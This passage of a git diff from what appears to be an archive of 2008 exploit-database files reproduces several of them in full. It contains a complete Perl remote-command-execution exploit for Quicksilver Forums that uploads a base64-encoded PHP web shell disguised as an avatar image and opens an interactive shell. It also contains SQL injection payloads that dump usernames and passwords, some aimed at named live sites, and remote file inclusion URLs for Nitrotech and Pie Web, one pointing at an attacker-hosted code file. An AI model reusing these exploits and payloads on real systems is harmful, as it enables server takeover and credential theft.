\w+_pass=([a-z0-9]{32})/) - { - my $hash_pwd = $1; close($sd); - print STDOUT "\n[+] Logged in with $user account\n"; - - return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};"; - } - - our $debug .= $res; - } - - close($sd); - return undef; -} - -sub upload_avatar -{ - create_socket(); - # Image content + post's var base64 encoded - my $data = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk". - "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF". - "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t". - "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY". 
- "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS". - "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E". - "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI". - "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND". - "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5". - "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD". - "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV". - "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ". - "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv". - "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL". - "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS". - "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t". - "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K"; - - $data = decode_base64($data); - - print $sd "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n". - "Host: $host\r\n" . - "Connection: keep-alive\r\n" . - "Cookie: $cookie\r\n" . - "Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" . - "Content-Length: ". length($data)."\r\n\r\n" . - $data . "\r\n\r\n"; - - - while(my $res = <$sd>) - { - if($res =~ /Your avatar has been updated/) - { - print "[+] Malicious avatar uploaded\n\n"; close($sd); - return 1; - } - - our $debug .= $res; - } - - close($sd); - return undef; -} - -sub create_socket -{ - our $sd = new IO::Socket::INET( 'PeerAddr' => $host, - 'PeerPort' => '80', - 'Proto' => 'tcp', - ) or die $@; -} - -sub debug -{ - my $output = shift; - my $errno = shift; - - open(DEBUG, '>', 'debug.txt'); - print DEBUG $debug; - - if($errno eq '0') - { - print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n"; - } - if($errno eq '1') - { - print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n"; - } - elsif($errno eq '2') - { - print STDOUT "\n[-] Unable to upload avatar! 
See debug.txt for more infos.\n"; - } - elsif($errno eq '3') - { - print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n"; - } - - close(DEBUG); - exit; -} - -sub banner -{ - print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n". - "[+] Local File Inclusion / Malicious Avatar Upload\n". - "[+] Coded by __GiReX__\n\n"; -} - -# milw0rm.com [2008-11-24] +# Author: __GiReX__ +# Homepage: girex.altervista.org + +# Date: 24/11/2008 + +# CMS: Quicksilver Forums <= 1.4.2 +# Site: http://www.quicksilverforums.com/ + +# Bug: Local File Inclusion +# Exploit: Remote Command Execution + +# Note: Works with windows servers only + Works regardless php.ini settings + +# Bug Discussion: + +# file: global.php +# lines: 318-329 + + function get_lang($lang, $a = null, $path = './', $main = true) + { + if (isset($this->get['lang'])) { + $lang = $this->get['lang']; + + } + + if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) { + $lang = 'en'; + } + + include $path . 'languages/' . $lang . '.php'; + +# As you can see, Quicksilver filter can be easily bypassed in windows servers +# couse use of backslashes "\" in filesystem's paths. 
+ +# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting + +# We can upload a malicious avatar and include it to have a RCE + + +#!/usr/bin/perl +# Quicksilver Forums <= 1.4.2 RCE Exploit (win only) +# Local File Inclusion / Malicious Avatar Upload +# Coded by __GiReX__ + +use IO::Socket::INET; +use MIME::Base64; + +if(@ARGV < 3) +{ + banner(); + print "[+] You need an user account to run this exploit\n\n"; + print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n"; + print "[+] Example: perl $0 localhost /quick/ test password\n"; + exit; +} + +my ($host, $path, $user, $pass) = @ARGV; + +$host =~ s/^http:\/\///; +$host =~ s/^www\.//; +$target = "http://${host}${path}"; + +banner(); +check_vuln(); + +$cookie = do_login() or debug($debug, 1); +upload_avatar() or debug($debug, 2); + +while(1) +{ + print "[+] shell\@quick:\$ "; + chomp(my $cmd = <STDIN>); + + exit if $cmd eq 'exit'; + create_socket(); + + print $sd "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n". + "Host: $host\r\n". + "Cookie: $cookie\r\n". + "CMD: ". encode_base64($cmd)."\r\n". + "Connection: keep-alive\r\n\r\n"; + + $out .= $_ while <$sd>; + + if($out =~ /-code-/) + { + $_out = substr($out, index($out, '-code-') + 6); $n = index($_out, '-code'); + $__out = substr($_out, 0, $n); + } + else + { + debug($out, 3); + } + + close($sd); + $out = undef; + + print STDOUT "\n". $__out."\n"; +} + +sub check_vuln +{ + create_socket(); + + print $sd "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n". + "Host: $host\r\n". 
+ "Connection: keep-alive\r\n\r\n"; + + while(my $res = <$sd>) + { + $ok = 1 if $res =~ /404 Not Found/; + + if($res =~ /<b>Fatal error<\/b>/) + { + close($sd); + return 1; + } + + our $debug .= $res; + } + + print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit + if not defined $ok; + + debug($debug, 0); +} + + +sub do_login +{ + create_socket(); + my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia"; + + print $sd "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" . + "Host: $host\r\n" . + "Connection: keep-alive\r\n" . + "Content-Type: application/x-www-form-urlencoded\r\n" . + "Content-Length: ". length($data)."\r\n\r\n" . + $data . "\r\n\r\n"; + + + + while(my $res = <$sd>) + { + if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/) + { + $prefix = $1 unless $prefix; + $user_id = $2 unless $user_id; + } + elsif($res =~ /Set-Cookie: \w+_pass=([a-z0-9]{32})/) + { + my $hash_pwd = $1; close($sd); + print STDOUT "\n[+] Logged in with $user account\n"; + + return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};"; + } + + our $debug .= $res; + } + + close($sd); + return undef; +} + +sub upload_avatar +{ + create_socket(); + # Image content + post's var base64 encoded + my $data = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk". + "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF". + "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t". + "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY". + "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS". + "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E". + "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI". + "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND". + "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5". + "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD". + "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV". 
+ "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ". + "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv". + "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL". + "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS". + "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t". + "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K"; + + $data = decode_base64($data); + + print $sd "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n". + "Host: $host\r\n" . + "Connection: keep-alive\r\n" . + "Cookie: $cookie\r\n" . + "Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" . + "Content-Length: ". length($data)."\r\n\r\n" . + $data . "\r\n\r\n"; + + + while(my $res = <$sd>) + { + if($res =~ /Your avatar has been updated/) + { + print "[+] Malicious avatar uploaded\n\n"; close($sd); + return 1; + } + + our $debug .= $res; + } + + close($sd); + return undef; +} + +sub create_socket +{ + our $sd = new IO::Socket::INET( 'PeerAddr' => $host, + 'PeerPort' => '80', + 'Proto' => 'tcp', + ) or die $@; +} + +sub debug +{ + my $output = shift; + my $errno = shift; + + open(DEBUG, '>', 'debug.txt'); + print DEBUG $debug; + + if($errno eq '0') + { + print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n"; + } + if($errno eq '1') + { + print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n"; + } + elsif($errno eq '2') + { + print STDOUT "\n[-] Unable to upload avatar! See debug.txt for more infos.\n"; + } + elsif($errno eq '3') + { + print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n"; + } + + close(DEBUG); + exit; +} + +sub banner +{ + print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n". + "[+] Local File Inclusion / Malicious Avatar Upload\n". + "[+] Coded by __GiReX__\n\n"; +} + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7218.txt b/platforms/php/webapps/7218.txt index 29543c55e..be3463fcf 100755 
--- a/platforms/php/webapps/7218.txt
+++ b/platforms/php/webapps/7218.txt
@@ -1,57 +1,57 @@ -Name: Nitrotech 0.0.3a Multiple Remote Vulnerabilities -Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr -Author: Osirys, thanks to x0r -Contact: osirys@live.it - -Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection. - -#### Remote File Inclusion Vulnerability - -The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable. -Let's see the code. - -File: /[path]/includes/common.php - -[code] -<?php - -session_start(); -$SID = session_id(); - - include($root . "config.php"); -# OTHER CODE -[/code] - -## EXPLOIT: - http://localhost/[path]/includes/common.php?root=http://oursite.it/phpcode.txt?? -## - -As we can see, it's included a non declareted variable -> $root. -To fix this bug, we could just define this variable. - -#### Sql Injection Vulnerability - -Note: In the source there could be other sql injection, just found them by yourself if you are intersted ! - -This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability -we could filtered the variable, for example with an int(). - -File: /[path]/members.php - -[code] - if($page_mode == 'view_user') - { - $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'"; - $result1 = mysql_query($query1); -# OTHER CODE -[/code] - -## EXPLOIT: - http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user& -## - -As we can see, The 'id' variable comes directly from get. So we can inject our hell code. 
- -#### - -# milw0rm.com [2008-11-24] +Name: Nitrotech 0.0.3a Multiple Remote Vulnerabilities +Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr +Author: Osirys, thanks to x0r +Contact: osirys@live.it + +Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection. + +#### Remote File Inclusion Vulnerability + +The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable. +Let's see the code. + +File: /[path]/includes/common.php + +[code] +<?php + +session_start(); +$SID = session_id(); + + include($root . "config.php"); +# OTHER CODE +[/code] + +## EXPLOIT: + http://localhost/[path]/includes/common.php?root=http://oursite.it/phpcode.txt?? +## + +As we can see, it's included a non declareted variable -> $root. +To fix this bug, we could just define this variable. + +#### Sql Injection Vulnerability + +Note: In the source there could be other sql injection, just found them by yourself if you are intersted ! + +This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability +we could filtered the variable, for example with an int(). + +File: /[path]/members.php + +[code] + if($page_mode == 'view_user') + { + $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'"; + $result1 = mysql_query($query1); +# OTHER CODE +[/code] + +## EXPLOIT: + http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user& +## + +As we can see, The 'id' variable comes directly from get. So we can inject our hell code. + +#### + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7221.txt b/platforms/php/webapps/7221.txt index 99cfd128c..aba063d67 100755 --- a/platforms/php/webapps/7221.txt +++ b/platforms/php/webapps/7221.txt 
@@ -1,113 +1,112 @@
-
-===========================================================================================
-
-
- [o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
-
- Software : Pie Web M{a,e}sher version 0.5.3
- Vendor : http://pie.ekkaia.org/
- Download : http://pie.ekkaia.org/page/Download
- Author : NoGe
- Contact : noge[dot]code[at]gmail[dot]com
- Blog : http://evilc0de.blogspot.com
-
-
-===========================================================================================
-
-
- [o] Vulnerable file
-
- all file below is affected by "lib" parameter
-
- lib/action/alias.php
- lib/action/cancel.php
- lib/action/context.php
- lib/action/deadlinks.php
- lib/action/delete.php
- lib/action/diff.php
- lib/action/download.php
- lib/action/dump.php
- lib/action/edit.php
- lib/action/fileimport.php
- lib/action/fileinfo.php
- lib/action/filelist.php
- lib/action/goto.php
- lib/action/history.php
- lib/action/image.php
- lib/action/latest.php
- lib/action/links.php
- lib/action/logflush.php
- lib/action/login.php
- lib/action/logout.php
- lib/action/logshow.php
- lib/action/maintenance.php
- lib/action/page.php
- lib/action/pageimport.php
- lib/action/pageinfo.php
- lib/action/pagelist.php
- lib/action/password.php
- lib/action/preview.php
- lib/action/purge.php
- lib/action/referers.php
- lib/action/register.php
- lib/action/rename.php
- lib/action/revert.php
- lib/action/rss.php
- lib/action/search.php
- lib/action/show.php
- lib/action/source.php
- lib/action/systeminfo.php
- lib/action/update.php
- lib/action/upgrade.php
- lib/action/upload.php
- lib/action/useradd.php
- lib/action/userdel.php
- lib/action/useredit.php
- lib/action/userimport.php
- lib/action/userinfo.php
- lib/action/userlist.php
- lib/action/version.php
- lib/action/wipe.php
-
- all file below is affected by "GLOBALS[pie][library_path]" parameter
-
- lib/class/diff.php
- lib/class/file.php
- lib/class/locale.php
- lib/class/mapfile.php
- lib/class/page.php
- lib/class/user.php
- lib/class/userpref.php
- lib/compiler/html.php
- lib/share/auth.php
- lib/share/errorimage.php
- lib/share/link.php
- lib/share/log.php
- lib/share/private.php
- lib/share/referers.php
-
-
-
- [o] Exploit
-
- http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
- http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
- http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
- http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
-
-
-===========================================================================================
-
-
- [o] Greetz
-
- MainHack BrotherHood [ http://serverisdown.org/blog/]
- Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
- H312Y yooogy mousekill }^-^{ kaka11 martfella
- skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
- GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-===========================================================================================
-
-# milw0rm.com [2008-11-24]
+===========================================================================================
+
+
+ [o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
+
+ Software : Pie Web M{a,e}sher version 0.5.3
+ Vendor : http://pie.ekkaia.org/
+ Download : http://pie.ekkaia.org/page/Download
+ Author : NoGe
+ Contact : noge[dot]code[at]gmail[dot]com
+ Blog : http://evilc0de.blogspot.com
+
+
+===========================================================================================
+
+
+ [o] Vulnerable file
+
+ all file below is affected by "lib" parameter
+
+ lib/action/alias.php
+ lib/action/cancel.php
+ lib/action/context.php
+ lib/action/deadlinks.php
+ lib/action/delete.php
+ lib/action/diff.php
+ lib/action/download.php
+ lib/action/dump.php
+ lib/action/edit.php
+ lib/action/fileimport.php
+ lib/action/fileinfo.php
+ lib/action/filelist.php
+ lib/action/goto.php
+ lib/action/history.php
+ lib/action/image.php
+ lib/action/latest.php
+ lib/action/links.php
+ lib/action/logflush.php
+ lib/action/login.php
+ lib/action/logout.php
+ lib/action/logshow.php
+ lib/action/maintenance.php
+ lib/action/page.php
+ lib/action/pageimport.php
+ lib/action/pageinfo.php
+ lib/action/pagelist.php
+ lib/action/password.php
+ lib/action/preview.php
+ lib/action/purge.php
+ lib/action/referers.php
+ lib/action/register.php
+ lib/action/rename.php
+ lib/action/revert.php
+ lib/action/rss.php
+ lib/action/search.php
+ lib/action/show.php
+ lib/action/source.php
+ lib/action/systeminfo.php
+ lib/action/update.php
+ lib/action/upgrade.php
+ lib/action/upload.php
+ lib/action/useradd.php
+ lib/action/userdel.php
+ lib/action/useredit.php
+ lib/action/userimport.php
+ lib/action/userinfo.php
+ lib/action/userlist.php
+ lib/action/version.php
+ lib/action/wipe.php
+
+ all file below is affected by "GLOBALS[pie][library_path]" parameter
+
+ lib/class/diff.php
+ lib/class/file.php
+ lib/class/locale.php
+ lib/class/mapfile.php
+ lib/class/page.php
+ lib/class/user.php
+ lib/class/userpref.php
+ lib/compiler/html.php
+ lib/share/auth.php
+ lib/share/errorimage.php
+ lib/share/link.php
+ lib/share/log.php
+ lib/share/private.php
+ lib/share/referers.php
+
+
+
+ [o] Exploit
+
+ http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
+ http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
+ http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
+ http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
+
+
+===========================================================================================
+
+
+ [o] Greetz
+
+ MainHack BrotherHood [ http://serverisdown.org/blog/]
+ Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+ H312Y yooogy mousekill }^-^{ kaka11 martfella
+ skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+ GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+===========================================================================================
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7222.txt b/platforms/php/webapps/7222.txt
index 1650a10be..7a023f2c4 100755
--- a/platforms/php/webapps/7222.txt
+++ b/platforms/php/webapps/7222.txt
@@ -1,46 +1,46 @@
-WebStudio eHotel (pageid) Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home : www.IQ-TY.com & www.TrYaG.cc
-
-___________________________________
-
-script : http://www.bdigital.biz/index.php?pageid=216
-
-DorK : "Powered by WebStudio eHotel"
-
-Demo :
-_______
-
-
-http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3
-( TRUE )
-
-
-
-http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4
-( FALSE )
-
-
-
-http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5
-( FALSE )
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
- Im IRAQi | Im TrYaGi
-
-# milw0rm.com [2008-11-25]
+WebStudio eHotel (pageid) Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home : www.IQ-TY.com & www.TrYaG.cc
+
+___________________________________
+
+script : http://www.bdigital.biz/index.php?pageid=216
+
+DorK : "Powered by WebStudio eHotel"
+
+Demo :
+_______
+
+
+http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3
+( TRUE )
+
+
+
+http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4
+( FALSE )
+
+
+
+http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5
+( FALSE )
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7223.txt b/platforms/php/webapps/7223.txt
index a86d5b6e6..e118b5243 100755
--- a/platforms/php/webapps/7223.txt
+++ b/platforms/php/webapps/7223.txt
@@ -1,46 +1,46 @@
-WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home : www.IQ-TY.com & www.TrYaG.cc
-
-___________________________________
-
-script : http://www.bdigital.biz/index.php?pageid=218
-
-DorK : ""Powered by WebStudio eCatalogue""
-
-Demo :
-_______
-
-
-http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=3
-( TRUE )
-
-
-
-http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=4
-( FALSE )
-
-
-
-http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=5
-( FALSE )
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
- Im IRAQi | Im TrYaGi
-
-# milw0rm.com [2008-11-25]
+WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home : www.IQ-TY.com & www.TrYaG.cc
+
+___________________________________
+
+script : http://www.bdigital.biz/index.php?pageid=218
+
+DorK : ""Powered by WebStudio eCatalogue""
+
+Demo :
+_______
+
+
+http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=3
+( TRUE )
+
+
+
+http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=4
+( FALSE )
+
+
+
+http://webstudioecatalogue.com/index.php?pageid=50+and+substring(@@version,1,1)=5
+( FALSE )
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7224.txt b/platforms/php/webapps/7224.txt
index a1c1ac7a2..dd8f56a5e 100755
--- a/platforms/php/webapps/7224.txt
+++ b/platforms/php/webapps/7224.txt
@@ -1,47 +1,47 @@
-+---------------------------------------------------------------------------------------+
-| |
-| FAQ Manager 1.2 (categorie.php cat_id) Remote SQL Injection Vulnerability |
-| Bug found by cOndemned |
-| |
-| Script site : http://www.4yoursite.nl/script_faq_manager.php |
-| |
-| Greetz: ZaBeaTy, str0ke, doctor, Necro, 0in, TBH, Av... |
-| |
-+---------------------------------------------------------------------------------------+
-
-
-# source of categorie.php
-
- [ ... ]
-
- 21. $catid = $_GET['cat_id'];
-
- [ ... ]
-
- 72. $faq_query = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
-
- 73. while($faq = mysql_fetch_assoc($faq_query))
-
- 74. {
-
- 75. $faq_cat_id = ($faq['faq_cat_id']);
-
- 76. }
-
- 77.
-
- 78. $result = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
-
- [ ... ]
-
-
-# proof of concept
-
- http://[host]/[faq_manager_path]/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
-
-
-# live demo
-
- http://www.4yoursite.nl/demo/faq_manager/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
-
-# milw0rm.com [2008-11-25]
++---------------------------------------------------------------------------------------+
+| |
+| FAQ Manager 1.2 (categorie.php cat_id) Remote SQL Injection Vulnerability |
+| Bug found by cOndemned |
+| |
+| Script site : http://www.4yoursite.nl/script_faq_manager.php |
+| |
+| Greetz: ZaBeaTy, str0ke, doctor, Necro, 0in, TBH, Av... |
+| |
++---------------------------------------------------------------------------------------+
+
+
+# source of categorie.php
+
+ [ ... ]
+
+ 21. $catid = $_GET['cat_id'];
+
+ [ ... ]
+
+ 72. $faq_query = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
+
+ 73. while($faq = mysql_fetch_assoc($faq_query))
+
+ 74. {
+
+ 75. $faq_cat_id = ($faq['faq_cat_id']);
+
+ 76. }
+
+ 77.
+
+ 78. $result = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid");
+
+ [ ... ]
+
+
+# proof of concept
+
+ http://[host]/[faq_manager_path]/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
+
+
+# live demo
+
+ http://www.4yoursite.nl/demo/faq_manager/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7225.txt b/platforms/php/webapps/7225.txt
index 596f081e1..29dea1985 100755
--- a/platforms/php/webapps/7225.txt
+++ b/platforms/php/webapps/7225.txt
@@ -1,36 +1,36 @@
-[~] Pie Web RSS module 0.1 (lib) Remote File injulide : ) )
-[~]
-[~] download: http://pie.ekkaia.org/file/mod_rss-0.1.tar.gz
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: RedHaK Kardesime ozel tesekurler.
-[~] -----------------------------------------------------------
-
-file: rss-0.1/lib/action/rss.php
-
-c0de:
-
-include_once("$lib/class/page.php");
-include_once("$lib/share/link.php");
-include_once("$lib/share/stdio.php");
-include_once("$lib/share/string.php");
-
-exp:
-
-http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & RedHaK
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-25]
+[~] Pie Web RSS module 0.1 (lib) Remote File injulide : ) )
+[~]
+[~] download: http://pie.ekkaia.org/file/mod_rss-0.1.tar.gz
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: RedHaK Kardesime ozel tesekurler.
+[~] -----------------------------------------------------------
+
+file: rss-0.1/lib/action/rss.php
+
+c0de:
+
+include_once("$lib/class/page.php");
+include_once("$lib/share/link.php");
+include_once("$lib/share/stdio.php");
+include_once("$lib/share/string.php");
+
+exp:
+
